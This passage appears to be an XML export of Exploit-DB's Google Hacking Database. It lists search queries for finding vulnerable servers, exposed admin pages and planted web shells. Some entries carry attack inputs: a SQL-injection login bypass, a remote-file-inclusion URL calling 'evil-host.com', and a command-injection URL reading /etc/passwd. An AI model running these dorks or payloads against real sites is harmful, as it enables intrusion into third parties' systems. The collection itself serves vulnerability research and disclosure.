<textualDescription>This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.</textualDescription>
<query>&quot;Welcome to PHP-Nuke&quot; congratulations</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+PHP-Nuke%22+congratulations&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>271</id>
<link>https://www.exploit-db.com/ghdb/271</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Welcome to the Prestige Web-Based Configurator&quot;</shortDescription>
<textualDescription>This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router.</textualDescription>
<query>&quot;Welcome to the Prestige Web-Based Configurator&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+the+Prestige+Web-Based+Configurator%22+</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3639</id>
<link>https://www.exploit-db.com/ghdb/3639</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;www.*.com - c99shell&quot; OR &quot;www.*.net - c99shell&quot; OR &quot;www.*.org - c99shell&quot;</shortDescription>
<textualDescription>Locates c99 web shells Author: ScOrPiOn</textualDescription>
<query>&quot;www.*.com - c99shell&quot; OR &quot;www.*.net - c99shell&quot; OR &quot;www.*.org - c99shell&quot;</query>
<querystring>https://www.google.com/search?q=%22www.*.com+-+c99shell%22+OR+%22www.*.net+-+c99shell%22+OR+%22www.*.org+-+c99shell%22</querystring>
<edb></edb>
<date>2010-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>63</id>
<link>https://www.exploit-db.com/ghdb/63</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;YaBB SE Dev Team&quot;</shortDescription>
<textualDescription>Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.</textualDescription>
<query>&quot;YaBB SE Dev Team&quot;</query>
<querystring>https://www.google.com/search?q=%22YaBB+SE+Dev+Team%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1114</id>
<link>https://www.exploit-db.com/ghdb/1114</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;you can now password&quot; | &quot;this is a special page only seen by you. your profile visitors&quot; inurl:imchaos</shortDescription>
<textualDescription>IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page.</textualDescription>
<query>&quot;you can now password&quot; | &quot;this is a special page only seen by you. your profile visitors&quot; inurl:imchaos</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=%22you+can+now+password%22+%7C+%22this+is+a+special+page+only+seen+by+you.+your+profile+visitors%22++inurl%3Aimchaos</querystring>
<edb></edb>
<date>2005-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3633</id>
<link>https://www.exploit-db.com/ghdb/3633</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]&quot;</shortDescription>
<textualDescription>Locates r57 web shells Author: ScOrPiOn</textualDescription>
<query>&quot;[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]&quot;</query>
<querystring>https://www.google.com/search?q=%22[+phpinfo+]++[+php.ini+]++[+cpu+]++[+mem+]++[+users+]++[+tmp+]++[+delete+]%22</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>370</id>
<link>https://www.exploit-db.com/ghdb/370</link>
<category>Vulnerable Servers</category>
<shortDescription>(&quot;Indexed.By&quot;|&quot;Monitored.By&quot;) hAcxFtpScan</shortDescription>
<textualDescription>hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it.</textualDescription>
<query>(&quot;Indexed.By&quot;|&quot;Monitored.By&quot;) hAcxFtpScan</query>
<querystring>https://www.google.com/search?q=hAcxFtpScan&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>653</id>
<link>https://www.exploit-db.com/ghdb/653</link>
<category>Vulnerable Servers</category>
<shortDescription>(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)</shortDescription>
<textualDescription>This is a &quot;double dork&quot; finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal.</textualDescription>
<query>(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%28inurl%3A%2Fshop.cgi%2Fpage%3D%29+%7C+%28inurl%3A%2Fshop.pl%2Fpage%3D%29</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3997</id>
<link>https://www.exploit-db.com/ghdb/3997</link>
<category>Vulnerable Servers</category>
<shortDescription>allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit</shortDescription>
<textualDescription>The dork &quot;allintext:Copyright Smart PHP Poll. All Rights Reserved.
-exploit&quot; show all the sites that uses Smart Pool php module.
The login page can be bypassed using these credentials
User: admin 'or' 1=1
Password: anything
More info here: https://www.exploit-db.com/exploits/36386/
PsyDel</textualDescription>
<query>allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit</query>
<querystring>https://www.google.com/search?q=allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit</querystring>
<edb>https://www.exploit-db.com/exploits/36386</edb>
<date>2015-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>388</id>
<link>https://www.exploit-db.com/ghdb/388</link>
<category>Vulnerable Servers</category>
<shortDescription>allinurl:&quot;index.php&quot; &quot;site=sglinks&quot;</shortDescription>
<textualDescription>Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com</textualDescription>
<query>allinurl:&quot;index.php&quot; &quot;site=sglinks&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:%22index.php%22+%22site=sglinks%22&amp;num=100&amp;start=100</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>152</id>
<link>https://www.exploit-db.com/ghdb/152</link>
<category>Vulnerable Servers</category>
<shortDescription>allinurl:install/install.php</shortDescription>
<textualDescription>Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images.</textualDescription>
<query>allinurl:install/install.php</query>
<querystring>https://www.google.com/search?q=allinurl:install/install.php&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-04-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>141</id>
<link>https://www.exploit-db.com/ghdb/141</link>
<category>Vulnerable Servers</category>
<shortDescription>allinurl:intranet admin</shortDescription>
<textualDescription>According to whatis.com: &quot;An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.&quot; Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering.</textualDescription>
<query>allinurl:intranet admin</query>
<querystring>https://www.google.com/search?q=allinurl%3Aintranet+admin</querystring>
<edb></edb>
<date>2004-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3995</id>
<link>https://www.exploit-db.com/ghdb/3995</link>
<category>Vulnerable Servers</category>
<shortDescription>allinurl:moadmin.php -google -github</shortDescription>
<textualDescription>The dork &quot;allinurl:moadmin.php -google -github&quot; show all the sites that
uses Mongo DB
and the moadmin module to amministrate it.
Some versions of this module allow non autenticated user to execute
arbitrary Unix commands sending a special POST request documented here:
https://www.exploit-db.com/exploits/36251/
PsyDel</textualDescription>
<query>allinurl:moadmin.php -google -github</query>
<querystring>https://www.google.com/search?q=allinurl:moadmin.php -google -github</querystring>
<edb>https://www.exploit-db.com/exploits/36251</edb>
<date>2015-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4782</id>
<link>https://www.exploit-db.com/ghdb/4782</link>
<category>Vulnerable Servers</category>
<shortDescription>Drupal CMS - Drupalgeddon2</shortDescription>
<textualDescription>GoogleDork #1 ~ inurl:&quot;/user/register&quot; &quot;Powered by Drupal&quot; -CAPTCHA -&quot;Access denied&quot;
GoogleDork #2 ~ inurl:&quot;user/register?element_parents=account/mail&quot;
GoogleDork #3 ~ inurl:&quot;*drupal_ajax&quot;
GoogleDork #4 ~ ;)
</textualDescription>
<query>inurl:&quot;/user/register&quot; &quot;Powered by Drupal&quot; -CAPTCHA -&quot;Access denied&quot;</query>
<querystring>https://www.google.com/?q=inurl:&quot;/user/register&quot; &quot;Powered by Drupal&quot; -CAPTCHA -&quot;Access denied&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/44449</edb>
<date>2018-04-17</date>
<author>Pancaker</author>
</entry>
<entry>
<id>2872</id>
<link>https://www.exploit-db.com/ghdb/2872</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB 12514</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/12514/</textualDescription>
<query>allinurl: op=viewslink&amp;sid=</query>
<querystring>https://www.google.com/search?q=allinurl%3A+op%3Dviewslink%26sid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12514</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2550</id>
<link>https://www.exploit-db.com/ghdb/2550</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB 14078</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/14078/</textualDescription>
<query>allinurl: In YoUr Dream Lamerz</query>
<querystring>https://www.google.com/search?q=allinurl%3A+In+YoUr+Dream+Lamerz</querystring>
<edb>https://www.exploit-db.com/exploits/14078</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3471</id>
<link>https://www.exploit-db.com/ghdb/3471</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB 3759 </shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/3759/</textualDescription>
<query>: inurll ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; &quot;top&quot; , -anchor =&gt; 'e' ) ;</query>
<querystring>https://www.google.co.uk/search?q=%3A+inurll+%27%2C+-font+%3D%3E+%27%7BVerdana%7D+8+bold%27)+-%3Epack+(+-side+%3D%3E+%22top%22+%2C+-anchor+%3D%3E+%27e%27+)+%3B</querystring>
<edb>https://www.exploit-db.com/exploits/3759</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2969</id>
<link>https://www.exploit-db.com/ghdb/2969</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB 9347</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/9347/</textualDescription>
<query>&quot;intitle:t3al shmeh&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3At3al+shmeh&amp;oq=intitle%3At3al+shmeh</querystring>
<edb>https://www.exploit-db.com/exploits/9347</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1959</id>
<link>https://www.exploit-db.com/ghdb/1959</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB-ID 5703</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/5703/</textualDescription>
<query>inurl:&quot;read.php?datespan=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A&quot;read.php%3Fdatespan%3D&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/5703</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2320</id>
<link>https://www.exploit-db.com/ghdb/2320</link>
<category>Vulnerable Servers</category>
<shortDescription>EDB-ID 8012</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/8012/</textualDescription>
<query>intitle:&quot;A Better ASP User Gallery&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22A+Better+ASP+User+Gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/8012</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3964</id>
<link>https://www.exploit-db.com/ghdb/3964</link>
<category>Vulnerable Servers</category>
<shortDescription>ext:cgi inurl:cgi-bin intext:#!/bin/bash</shortDescription>
<textualDescription>gnu-bash site dorks
Ariel Anonis - @ariel_anonis</textualDescription>
<query>ext:cgi inurl:cgi-bin intext:#!/bin/bash</query>
<querystring>https://www.google.com/search?q=ext:cgi inurl:cgi-bin intext:#!/bin/bash</querystring>
<edb></edb>
<date>2014-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>384</id>
<link>https://www.exploit-db.com/ghdb/384</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:cgi inurl:&quot;fileman.cgi&quot;</shortDescription>
<textualDescription>This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a &quot;simple&quot; but &quot;cost effective&quot; way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected &quot;fileman.log&quot; logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds).</textualDescription>
<query>filetype:cgi inurl:&quot;fileman.cgi&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Acgi+inurl%3A%22fileman.cgi%22</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>379</id>
<link>https://www.exploit-db.com/ghdb/379</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:cgi inurl:&quot;Web_Store.cgi&quot;</shortDescription>
<textualDescription>Zero X reported that &quot;Web_Store.cgi&quot; allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point.</textualDescription>
<query>filetype:cgi inurl:&quot;Web_Store.cgi&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Acgi+inurl%3A%22Web_Store.cgi%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3756</id>
<link>https://www.exploit-db.com/ghdb/3756</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana</shortDescription>
<textualDescription>This search attempts to find the c99 backdoor that may be knowingly or
unknowingly installed on servers. I have refined the search in hopes that
more general talk about the backdoor, and also talk about the marijuana
strain does not pollute the results quite as much.
Author: Teague Newman</textualDescription>
<query>filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana</query>
<querystring>https://www.google.com/search?q=filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana</querystring>
<edb></edb>
<date>2011-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3757</id>
<link>https://www.exploit-db.com/ghdb/3757</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:php inurl:tiki-index.php +sirius +1.9.*</shortDescription>
<textualDescription>Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones</textualDescription>
<query>filetype:php inurl:tiki-index.php +sirius +1.9.*</query>
<querystring>https://www.google.com/search?q=filetype:php inurl:tiki-index.php +sirius +1.9.*</querystring>
<edb></edb>
<date>2011-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>269</id>
<link>https://www.exploit-db.com/ghdb/269</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:php inurl:vAuthenticate</shortDescription>
<textualDescription>vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule.</textualDescription>
<query>filetype:php inurl:vAuthenticate</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aphp+inurl%3AvAuthenticate</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1249</id>
<link>https://www.exploit-db.com/ghdb/1249</link>
<category>Vulnerable Servers</category>
<shortDescription>filetype:pl intitle:&quot;Ultraboard Setup&quot;</shortDescription>
<textualDescription>setup pages to the ultraboard system.</textualDescription>
<query>filetype:pl intitle:&quot;Ultraboard Setup&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Apl+intitle%3A%22Ultraboard+Setup%22&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>71</id>
<link>https://www.exploit-db.com/ghdb/71</link>
<category>Vulnerable Servers</category>
<shortDescription>Gallery in configuration mode</shortDescription>
<textualDescription>Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!</textualDescription>
<query>intitle:&quot;Gallery in Configuration mode&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Gallery+in+Configuration+mode%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>46</id>
<link>https://www.exploit-db.com/ghdb/46</link>
<category>Vulnerable Servers</category>
<shortDescription>Hassan Consulting's Shopping Cart Version 1.18</shortDescription>
<textualDescription>These servers can be messed with in many ways. One specific way is by way of the &quot;../&quot; bug. This lets you cruise around the web server in a somewhat limited fashion.</textualDescription>
<query>inurl:shop &quot;Hassan Consulting's Shopping Cart Version 1.18&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Ashop+%22Hassan+Consulting%27s+Shopping+Cart+Version+1%2E18%22</querystring>
<edb></edb>
<date>2003-07-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3803</id>
<link>https://www.exploit-db.com/ghdb/3803</link>
<category>Vulnerable Servers</category>
<shortDescription>intext: intext: intext: intext: intext:</shortDescription>
<textualDescription>More than 100k sites affected
It will show asp sites that are vulnerable to sql injection
(These links actually show pages which are attacked by mass Sql
Injection...which means they are vulnerable to sql Injection)
#Author
----- pgolecha
Palash Golecha
twitter- @pgolecha12</textualDescription>
<query>intext: intext: intext: intext: intext:</query>
<querystring>https://www.google.com/search?q=intext: intext: intext: intext: intext:</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>6223</id>
<link>https://www.exploit-db.com/ghdb/6223</link>
<category>Vulnerable Servers</category>
<shortDescription>intext:&quot;(c) GUnet 2003-2007&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;© GUnet 2003-2007&quot;
# GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection. This
dork is linked to the following existing exploits:
https://www.exploit-db.com/exploits/48106 ,
https://www.exploit-db.com/exploits/48163
# Date: 04/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;(c) GUnet 2003-2007&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;(c) GUnet 2003-2007&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6301</id>
<link>https://www.exploit-db.com/ghdb/6301</link>
<category>Vulnerable Servers</category>
<shortDescription>intext:&quot;Powered By Gila CMS&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered By Gila CMS&quot;
# Gila CMS 1.9.1 - Cross-Site Scripting. This dork is linked to the
# following existing exploit: https://www.exploit-db.com/exploits/46557
# Date: 17/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Powered By Gila CMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered By Gila CMS&quot;</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6728</id>
<link>https://www.exploit-db.com/ghdb/6728</link>
<category>Vulnerable Servers</category>
<shortDescription>intext:&quot;user name&quot; intext:&quot;orion core&quot; -solarwinds.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;user name&quot; intext:&quot;orion core&quot; -solarwinds.com
# Description: discover SolarWindws Orion web consoles exposed to the Internet.
# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)
</textualDescription>
<query>intext:&quot;user name&quot; intext:&quot;orion core&quot; -solarwinds.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;user name&quot; intext:&quot;orion core&quot; -solarwinds.com</querystring>
<edb></edb>
<date>2020-12-15</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>425</id>
<link>https://www.exploit-db.com/ghdb/425</link>
<category>Vulnerable Servers</category>
<shortDescription>intext:&quot;Warning: * am able * write ** configuration file&quot; &quot;includes/configure.php&quot; -Forums</shortDescription>
<textualDescription>OsCommerce has some security issues, including the following warning message: &quot;Warning: I am able to write to the configuration file&quot;. Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there.</textualDescription>
<query>intext:&quot;Warning: * am able * write ** configuration file&quot; &quot;includes/configure.php&quot; -Forums</query>
<querystring>https://www.google.com/search?q=intext:%22Warning:+*+am+able+*+write+**+configuration+file%22+%22includes/configure.php%22+-Forums&amp;num=100&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3826</id>
<link>https://www.exploit-db.com/ghdb/3826</link>
<category>Vulnerable Servers</category>
<shortDescription>intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp; inurl:gov</shortDescription>
<textualDescription># Exploit Title: SQLI Exploit
# Google Dork: intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp;
inurl:gov
# Date: 25/December/2012
# Exploit Author: BeastarStealacar
# Vendor Homepage: http://devil-zone.net/</textualDescription>
<query>intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp; inurl:gov</query>
<querystring>https://www.google.com/search?q=intext:SQL syntax &amp; inurl:index.php?=id &amp; inurl:gov &amp; inurl:gov</querystring>
<edb></edb>
<date>2012-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>3779</id>
<link>https://www.exploit-db.com/ghdb/3779</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;-N3t&quot; filetype:php undetectable</shortDescription>
<textualDescription>intitle:&quot;-N3t&quot; filetype:php undetectable
Search WebShell indexed on a page.
--
Joel Campusano Rojas.
632 161 62
@joelcampusano
Ingeniero Civil en Inform<72>tica.</textualDescription>
<query>intitle:&quot;-N3t&quot; filetype:php undetectable</query>
<querystring>https://www.google.com/search?q=intitle:&quot;-N3t&quot; filetype:php undetectable</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>192</id>
<link>https://www.exploit-db.com/ghdb/192</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Gateway Configuration Menu&quot;</shortDescription>
<textualDescription>This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query.</textualDescription>
<query>intitle:&quot;Gateway Configuration Menu&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Gateway+Configuration+Menu%22</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>7916</id>
<link>https://www.exploit-db.com/ghdb/7916</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;HFS&quot; AND intext:&quot;httpfileserver 2.3&quot; AND -intext:&quot;remote&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;HFS&quot; AND intext:&quot;httpfileserver 2.3&quot; AND
-intext:&quot;remote&quot;
# Author: Alexander Ahmann
# Email: hackermaneia@riseup.net
# Date: 11 March, 2022
# Category: Vulnerable Servers
Thapa (2016) devised an exploit targeting version 2.3 of Rejetto.com
(n.d.)'s &quot;HTTP File Server.&quot; Thapa included the Google dork
'intext:&quot;httpfileserver 2.3&quot;' as a means to find webservers on the
internet running the vulnerable service. However, there is a limitation
with this dork, as it instructs Google's search engine to list websites
which includes web pages with the text &quot;httpfileserver 2.3&quot; in it. This
will cause Google search to report security bulletins discussing the
vulnerability.
To mitigate this problem, I present a slight modification of Thapa's
Google dork to &quot;filter out&quot; said security bulletins: 'intitle:&quot;HFS&quot; AND
intext:&quot;httpfileserver 2.3&quot; AND -intext:&quot;remote&quot;' (without single
quotes, with double quotes). Elaborating on the components of my
modified Google dork:
1. 'intitle:&quot;HFS&quot;' will report web pages with the string &quot;HFS&quot; in the
metatag. This is a feature that I have identified unique to
Rejetto.com (n.d.)'s HTTP File Server.
2. 'intext:&quot;httpfileserver 2.3&quot;' will report web pages with the string
&quot;httpfileserver 2.3&quot; in its body. This is a feature that Thapa (2016)
identified in Rejetto.com (n.d.)'s HTTP File Server.
3. '-intext:&quot;remote&quot;' will &quot;filter out&quot; web pages with the string
&quot;remote&quot; in its body. I have identified this string as a feature of
security bulletins reporting on the Rejetto.com (n.d.)'s HTTP File
Server vulnerability.
The &quot;AND&quot; boolean operator is used to narrow down the search results and
decrease the rate of false positives.
References
----------
Rejetto.com (n.d.). HFS ~ HTTP File Server. Retrieved on Mar. 11, 2022
from: http://rejetto.com/hfs/
Thapa, A. K. (2016). Rejetto HTTP File Server (HFS) 2.3.x - Remote
Command Execution (2). Exploit Database. Retrieved on Mar. 11, 2022
from: https://www.exploit-db.com/exploits/39161
</textualDescription>
<query>intitle:&quot;HFS&quot; AND intext:&quot;httpfileserver 2.3&quot; AND -intext:&quot;remote&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HFS&quot; AND intext:&quot;httpfileserver 2.3&quot; AND -intext:&quot;remote&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Alexander Ahmann</author>
</entry>
<entry>
<id>1256</id>
<link>https://www.exploit-db.com/ghdb/1256</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Horde :: My Portal&quot; -&quot;[Tickets&quot;</shortDescription>
<textualDescription>Hi It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP</textualDescription>
<query>intitle:&quot;Horde :: My Portal&quot; -&quot;[Tickets&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;rls=GBSA%2CGBSA%3A2006-05%2CGBSA%3Aen&amp;q=intitle%3A%22Horde+%3A%3A+My+Portal%22+-%22%5BTickets%22</querystring>
<edb></edb>
<date>2006-02-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7169</id>
<link>https://www.exploit-db.com/ghdb/7169</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Icecast Streaming Media Server&quot; &quot;Icecast2 Status&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Icecast Streaming Media Server&quot; &quot;Icecast2 Status&quot; -.com
# Web Server Detection
#Date: 03/08/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Icecast Streaming Media Server&quot; &quot;Icecast2 Status&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Icecast Streaming Media Server&quot; &quot;Icecast2 Status&quot; -.com</querystring>
<edb></edb>
<date>2021-09-08</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7239</id>
<link>https://www.exploit-db.com/ghdb/7239</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/views/auth/passwords&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/views/auth/passwords&quot;
# Vulnerable Server
# Date: 08/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/views/auth/passwords&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/views/auth/passwords&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6179</id>
<link>https://www.exploit-db.com/ghdb/6179</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;index of&quot; &quot;AT-admin.cgi&quot;</shortDescription>
<textualDescription>Description: intitle:&quot;index of&quot; &quot;AT-admin.cgi&quot;
Author: Mohammed Arif H</textualDescription>
<query>intitle:&quot;index of&quot; &quot;AT-admin.cgi&quot;</query>
